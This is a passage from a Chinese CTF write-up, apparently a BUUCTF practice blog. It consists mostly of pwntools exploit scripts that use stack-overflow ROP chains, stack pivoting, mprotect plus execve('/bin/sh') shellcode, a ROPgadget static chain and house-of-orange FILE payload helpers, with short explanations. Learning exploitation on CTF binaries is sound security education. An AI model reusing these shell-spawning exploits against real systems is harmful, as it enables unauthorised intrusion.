    IO_file_jumps_offset = libc.sym['_IO_file_jumps']
    IO_str_underflow_offset = libc.sym['_IO_str_underflow']
    for ref_offset in libc.search(p64(IO_str_underflow_offset)):
        possible_IO_str_jumps_offset = ref_offset - 0x20
        if possible_IO_str_jumps_offset > IO_file_jumps_offset:
            # print possible_IO_str_jumps_offset
            return possible_IO_str_jumps_offset

def house_of_orange_payload(libc, libc_base):
  io_str_jump = libc_base + get_io_str_jumps_offset(libc)
  io_list_all = libc_base + libc.symbols['_IO_list_all']
  system = libc_base + libc.symbols['system']
  bin_sh = libc_base + next(libc.search('/bin/sh'))
  payload = pack_file_flush_str_jumps(io_str_jump, io_list_all, system, bin_sh)
  return payload

sl = lambda s : p.sendline(s)
sd = lambda s : p.send(s)
rc = lambda n : p.recv(n)
ru = lambda s : p.recvuntil(s)
ti = lambda : p.interactive()
def ms(name,addr):
    print name + "---->" + hex(addr)

def debug(mallocr,PIE=True):
    if PIE:
        text_base = int(os.popen("pmap {}| awk '{{print }}'".format(p.pid)).readlines()[1], 16)
        gdb.attach(p,'b *{}'.format(hex(text_base+mallocr)))
    else:
        gdb.attach(p,"b *{}".format(hex(mallocr)))

get_plt = elf.sym["gets"]
pop_rdi_ret = 0x0000000000400c83
puts_got = elf.got["puts"]
get_got = elf.got["gets"]
puts_plt = elf.sym["puts"]
py = ''
py += '\x00'
py += 'a'*(0x50-1)
py += 'b'*8
py += p64(pop_rdi_ret)
py += p64(get_got)
py += p64(puts_plt)
py += p64(0x0000000004009A0)
ru("Input your choice!")
sl('1')
ru("Input your Plaintext to be encrypted")
sl(py)

ru("Ciphertext")
rc(2)
addr = u64(rc(6).ljust(8,'\x00'))
libc_base = addr - libc.sym["gets"]
system = libc_base + libc.sym["system"]
binsh = libc_base + libc.search("/bin/sh").next()
ms("addr---->",addr)

pop_rdx_rsi_ret = 0x0000000000130569 + libc_base
syscall = 0x00000000000d2745 + libc_base
pop_rax_ret = 0x0000000000043ae8 + libc_base
leave_ret = 0x0000000000054913 + libc_base
ret = 0x00000000000008aa + libc_base
get_plt = elf.sym["gets"]
flag_addr = 0x000000000602000 #
mprotect  = libc_base + libc.sym['mprotect']

shellcode644 = asm('''
mov r8, 0x68732f6e69622f
push r8
mov rdi, rsp
mov rsi, 0
mov rdx, 0
mov eax, 0x3b
syscall
    ''')

py = ''
py += '\x00'
py += 'a'*(0x50-1)
py += p64(flag_addr+0x178)
# py += p64(ret)
py += p64(pop_rdi_ret)
py += p64(flag_addr)
py += p64(pop_rdx_rsi_ret)
py += p64(0x7)
py += p64(0x1000)
py += p64(mprotect)
py += p64(pop_rdi_ret)
py += p64(flag_addr+0x180)
py += p64(get_plt)
py += p64(leave_ret)
ru("Input your Plaintext to be encrypted")
# debug(0x0000000004009E2,0)
sl(py)
# ru("Ciphertext")
sl(p64(flag_addr+0x188)+shellcode644)#栈迁移后跳转到shellcode所在的地址！

p.interactive()

三、静态链接程序

这种静态链接的程序，因为无法泄露地址，一般情况下是调用mprotect改写got表的权限或者bss权限，然后注入shellcode即可getshell：

# -*- coding: utf-8 -*-
from pwn import *
from libformatstr import FormatStr
context.log_level = 'debug'
#!/usr/bin/env python2
# execve generated by ROPgadget
from struct import pack
# context.terminal=['tmux','splitw','-h']
# context(arch='amd64', os='linux')
context(arch='i386', os='linux')
local = 1
elf = ELF('./get_started_3dsctf_2016')
if local:
    sh = process('./get_started_3dsctf_2016')
    libc = elf.libc
else:
    sh = remote('node3.buuoj.cn',25397)
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
#onegadget64(libc.so.6)
#more onegadget
#one_gadget -l 200 /lib/x86_64-linux-gnu/libc.so.6
one64 = [0x45226,0x4527a,0xf0364,0xf1207]
# [rax == NULL;[rsp+0x30] == NULL,[rsp+0x50] == NULL,[rsp+0x70] == NULL]
#onegadget32(libc.so.6) 
# one32 = [0x3ac5c,0x3ac5e,0x3ac62,0x3ac69,0x5fbc5,0x5fbc6]

# py32 = fmtstr_payload(start_read_offset,{xxx_got:system_addr})
# sl(py32)
# py64 = FormatStr(isx64=1)
# py64[printf_got] = onegadget
# sl(py64.payload(start_read_offset))

# shellcode = asm(shellcraft.sh())
shellcode32 = '\x68\x01\x01\x01\x01\x81\x34\x24\x2e\x72\x69\x01\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\x6a\x0b\x58\xcd\x80' 
shellcode64 = '\x48\xb8\x01\x01\x01\x01\x01\x01\x01\x01\x50\x48\xb8\x2e\x63\x68\x6f\x2e\x72\x69\x01\x48\x31\x04\x24\x48\x89\xe7\x31\xd2\x31\xf6\x6a\x3b\x58\x0f\x05'
#shellcode64 = '\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05'
def pack_file(_flags = 0,
              _IO_read_ptr = 0,
              _IO_read_end = 0,
              _IO_read_base = 0,
              _IO_write_base = 0,
              _IO_write_ptr = 0,
              _IO_write_end = 0,
              _IO_buf_base = 0,
              _IO_buf_end = 0,
              _IO_save_base = 0,
              _IO_backup_base = 0,
              _IO_save_end = 0,
              _IO_marker = 0,
              _IO_chain = 0,
              _fileno = 0,
              _lock = 0,
              _wide_data = 0,
              _mode = 0):
    file_struct = p32(_flags) + \
             p32(0) + \
             p64(_IO_read_ptr) + \
             p64(_IO_read_end) + \
             p64(_IO_read_base) + \
             p64(_IO_write_base) + \
             p64(_IO_write_ptr) + \
             p64(_IO_write_end) + \
             p64(_IO_buf_base) + \
             p64(_IO_buf_end) + \
             p64(_IO_save_base) + \
             p64(_IO_backup_base) + \
             p64(_IO_save_end) + \
             p64(_IO_marker) + \
             p64(_IO_chain) + \
             p32(_fileno)
    file_struct = file_struct.ljust(0x88, "\x00")
    file_struct += p64(_lock)
    file_struct = file_struct.ljust(0xa0, "\x00")
    file_struct += p64(_wide_data)
    file_struct = file_struct.ljust(0xc0, '\x00')
    file_struct += p64(_mode)
    file_struct = file_struct.ljust(0xd8, "\x00")
    return file_struct

def pack_file_flush_str_jumps(_IO_str_jumps_addr, _IO_list_all_ptr, system_addr, binsh_addr):
    payload = pack_file(_flags = 0,
                        _IO_read_ptr = 0x61, #smallbin4file_size
                        _IO_read_base = _IO_list_all_ptr-0x10, # unsorted bin attack _IO_list_all_ptr,
                        _IO_write_base = 0,
                        _IO_write_ptr = 1,
                        _IO_buf_base = binsh_addr,
                        _mode = 0,
                       )
    payload += p64(_IO_str_jumps_addr-8)  # vtable
    payload += p64(0) # paddding
    payload += p64(system_addr)
    return payload

def get_io_str_jumps_offset(libc):
    IO_file_jumps_offset = libc.sym['_IO_file_jumps']
    IO_str_underflow_offset = libc.sym['_IO_str_underflow']
    for ref_offset in libc.search(p64(IO_str_underflow_offset)):
        possible_IO_str_jumps_offset = ref_offset - 0x20
        if possible_IO_str_jumps_offset > IO_file_jumps_offset:
            # print possible_IO_str_jumps_offset
            return possible_IO_str_jumps_offset

def house_of_orange_payload(libc, libc_base):
  io_str_jump = libc_base + get_io_str_jumps_offset(libc)
  io_list_all = libc_base + libc.symbols['_IO_list_all']
  system = libc_base + libc.symbols['system']
  bin_sh = libc_base + next(libc.search('/bin/sh'))
  payload = pack_file_flush_str_jumps(io_str_jump, io_list_all, system, bin_sh)
  return payload

sl = lambda s : sh.sendline(s)
sd = lambda s : sh.send(s)
rc = lambda n : sh.recv(n)
ru = lambda s : sh.recvuntil(s)
ti = lambda : sh.interactive()
def ms(name,addr):
    print name + "---->" + hex(addr)

def debug(mallocr,PIE=True):
    if PIE:
        text_base = int(os.popen("pmap {}| awk '{{print }}'".format(p.pid)).readlines()[1], 16)
        gdb.attach(sh,'b *{}'.format(hex(text_base+mallocr)))
    else:
        gdb.attach(sh,"b *{}".format(hex(mallocr)))


mprotect = elf.sym["mprotect"]
read = elf.sym["read"]
printf = elf.sym["printf"]
# pop3_ret = 0x0804f460
pop3_ret = 0x080509a5
binsh = 0x80EB000
# binsh = elf.bss()+0x200
leave_ret = 0x0809ee21
py = ''
py += 'a'*0x38
py += p32(mprotect)
py += p32(pop3_ret)
py += p32(binsh)
py += p32(0x1000)
py += p32(0x7)
py += p32(read)
py += p32(pop3_ret)
py += p32(0)
py += p32(binsh)
py += p32(0x100)
py += p32(binsh)

# debug(0x8048A3B,0)
sl(py)

pause()
sl(shellcode32)


sh.interactive()

第二种方法就是直接通过栈迁移，往bss或者got位置写入系统调用的rop链子，实现getshell，因为地址都是知道的~

# -*- coding: utf-8 -*-
from pwn import *
from libformatstr import FormatStr
context.log_level = 'debug'
#!/usr/bin/env python2
# execve generated by ROPgadget
from struct import pack
# context.terminal=['tmux','splitw','-h']
# context(arch='amd64', os='linux')
context(arch='i386', os='linux')
local = 1
elf = ELF('./get_started_3dsctf_2016')
if local:
    sh = process('./get_started_3dsctf_2016')
    libc = elf.libc
else:
    sh = remote('node3.buuoj.cn',25397)
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
#onegadget64(libc.so.6)
#more onegadget
#one_gadget -l 200 /lib/x86_64-linux-gnu/libc.so.6
one64 = [0x45226,0x4527a,0xf0364,0xf1207]
# [rax == NULL;[rsp+0x30] == NULL,[rsp+0x50] == NULL,[rsp+0x70] == NULL]
#onegadget32(libc.so.6) 
# one32 = [0x3ac5c,0x3ac5e,0x3ac62,0x3ac69,0x5fbc5,0x5fbc6]

# py32 = fmtstr_payload(start_read_offset,{xxx_got:system_addr})
# sl(py32)
# py64 = FormatStr(isx64=1)
# py64[printf_got] = onegadget
# sl(py64.payload(start_read_offset))

# shellcode = asm(shellcraft.sh())
shellcode32 = '\x68\x01\x01\x01\x01\x81\x34\x24\x2e\x72\x69\x01\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\x6a\x0b\x58\xcd\x80' 
shellcode64 = '\x48\xb8\x01\x01\x01\x01\x01\x01\x01\x01\x50\x48\xb8\x2e\x63\x68\x6f\x2e\x72\x69\x01\x48\x31\x04\x24\x48\x89\xe7\x31\xd2\x31\xf6\x6a\x3b\x58\x0f\x05'
#shellcode64 = '\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05'
def pack_file(_flags = 0,
              _IO_read_ptr = 0,
              _IO_read_end = 0,
              _IO_read_base = 0,
              _IO_write_base = 0,
              _IO_write_ptr = 0,
              _IO_write_end = 0,
              _IO_buf_base = 0,
              _IO_buf_end = 0,
              _IO_save_base = 0,
              _IO_backup_base = 0,
              _IO_save_end = 0,
              _IO_marker = 0,
              _IO_chain = 0,
              _fileno = 0,
              _lock = 0,
              _wide_data = 0,
              _mode = 0):
    file_struct = p32(_flags) + \
             p32(0) + \
             p64(_IO_read_ptr) + \
             p64(_IO_read_end) + \
             p64(_IO_read_base) + \
             p64(_IO_write_base) + \
             p64(_IO_write_ptr) + \
             p64(_IO_write_end) + \
             p64(_IO_buf_base) + \
             p64(_IO_buf_end) + \
             p64(_IO_save_base) + \
             p64(_IO_backup_base) + \
             p64(_IO_save_end) + \
             p64(_IO_marker) + \
             p64(_IO_chain) + \
             p32(_fileno)
    file_struct = file_struct.ljust(0x88, "\x00")
    file_struct += p64(_lock)
    file_struct = file_struct.ljust(0xa0, "\x00")
    file_struct += p64(_wide_data)
    file_struct = file_struct.ljust(0xc0, '\x00')
    file_struct += p64(_mode)
    file_struct = file_struct.ljust(0xd8, "\x00")
    return file_struct

def pack_file_flush_str_jumps(_IO_str_jumps_addr, _IO_list_all_ptr, system_addr, binsh_addr):
    payload = pack_file(_flags = 0,
                        _IO_read_ptr = 0x61, #smallbin4file_size
                        _IO_read_base = _IO_list_all_ptr-0x10, # unsorted bin attack _IO_list_all_ptr,
                        _IO_write_base = 0,
                        _IO_write_ptr = 1,
                        _IO_buf_base = binsh_addr,
                        _mode = 0,
                       )
    payload += p64(_IO_str_jumps_addr-8)  # vtable
    payload += p64(0) # paddding
    payload += p64(system_addr)
    return payload

def get_io_str_jumps_offset(libc):
    IO_file_jumps_offset = libc.sym['_IO_file_jumps']
    IO_str_underflow_offset = libc.sym['_IO_str_underflow']
    for ref_offset in libc.search(p64(IO_str_underflow_offset)):
        possible_IO_str_jumps_offset = ref_offset - 0x20
        if possible_IO_str_jumps_offset > IO_file_jumps_offset:
            # print possible_IO_str_jumps_offset
            return possible_IO_str_jumps_offset

def house_of_orange_payload(libc, libc_base):
  io_str_jump = libc_base + get_io_str_jumps_offset(libc)
  io_list_all = libc_base + libc.symbols['_IO_list_all']
  system = libc_base + libc.symbols['system']
  bin_sh = libc_base + next(libc.search('/bin/sh'))
  payload = pack_file_flush_str_jumps(io_str_jump, io_list_all, system, bin_sh)
  return payload

sl = lambda s : sh.sendline(s)
sd = lambda s : sh.send(s)
rc = lambda n : sh.recv(n)
ru = lambda s : sh.recvuntil(s)
ti = lambda : sh.interactive()
def ms(name,addr):
    print name + "---->" + hex(addr)

def debug(mallocr,PIE=True):
    if PIE:
        text_base = int(os.popen("pmap {}| awk '{{print }}'".format(p.pid)).readlines()[1], 16)
        gdb.attach(sh,'b *{}'.format(hex(text_base+mallocr)))
    else:
        gdb.attach(sh,"b *{}".format(hex(mallocr)))

mprotect = elf.sym["mprotect"]
read = elf.sym["read"]
printf = elf.sym["printf"]
# pop3_ret = 0x0804f460
pop3_ret = 0x080509a5
# binsh = 0x80EB000
binsh = elf.bss()+0x200
leave_ret = 0x0809ee21


pop_eax_ret = 0x080b91e6
pop_edx_ret = 0x0806fc0a
pop_ecx_ebx = 0x0806fc31
pop_ebp_ret = 0x080483ba
int_80 = 0x0806d7e5

py = ''
py += 'a'*0x38
py += p32(pop_ebp_ret)
py += p32(binsh-4)
py += p32(read)
py += p32(pop3_ret)
py += p32(0)
py += p32(binsh)
py += p32(0x200)
py += p32(leave_ret)
# py += p32(binsh)

# py += p32()
debug(0x8048A3B,0)
sl(py)

p = ''
p += pack('<I', 0x0806fc0a) # pop edx ; ret
p += pack('<I', 0x080eb060) # @ .data
p += pack('<I', 0x080b91e6) # pop eax ; ret
p += '/bin'
p += pack('<I', 0x080557ab) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806fc0a) # pop edx ; ret
p += pack('<I', 0x080eb064) # @ .data + 4
p += pack('<I', 0x080b91e6) # pop eax ; ret
p += '//sh'
p += pack('<I', 0x080557ab) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806fc0a) # pop edx ; ret
p += pack('<I', 0x080eb068) # @ .data + 8
p += pack('<I', 0x08049463) # xor eax, eax ; ret
p += pack('<I', 0x080557ab) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481ad) # pop ebx ; ret
p += pack('<I', 0x080eb060) # @ .data
p += pack('<I', 0x0806fc31) # pop ecx ; pop ebx ; ret
p += pack('<I', 0x080eb068) # @ .data + 8
p += pack('<I', 0x080eb060) # padding without overwrite ebx
p += pack('<I', 0x0806fc0a) # pop edx ; ret
p += pack('<I', 0x080eb068) # @ .data + 8
p += p32(pop_eax_ret)
p += p32(0xb)
p += pack('<I', 0x0806d7e5) # int 0x80
pause()
sl(p)

sh.interactive()

rop链子的静态生成命令如下：

1	ROPgadget --binary get_started_3dsctf_2016 --ropchain

这题主要培养的思维就是，32位程序的参数部署再次熟悉一下，然后通过pop的方式可以实现栈平衡从而实现函数的连续调用，还有就是静态文件很多函数可以用~直接获取到

四、关于抬栈的作用

这题就只有系统调用read和write，但是我尝试了中级栈溢出发现edi只能接收4位，所以不能实现execve调用，干脆抬栈实现地址泄露再进行system(“/bin/sh\x00”)来打。

Comments

BUUCTF刷题

前言

一、pwn1_sctf_2016

二、ciscn_2019_c_1

三、静态链接程序

Contents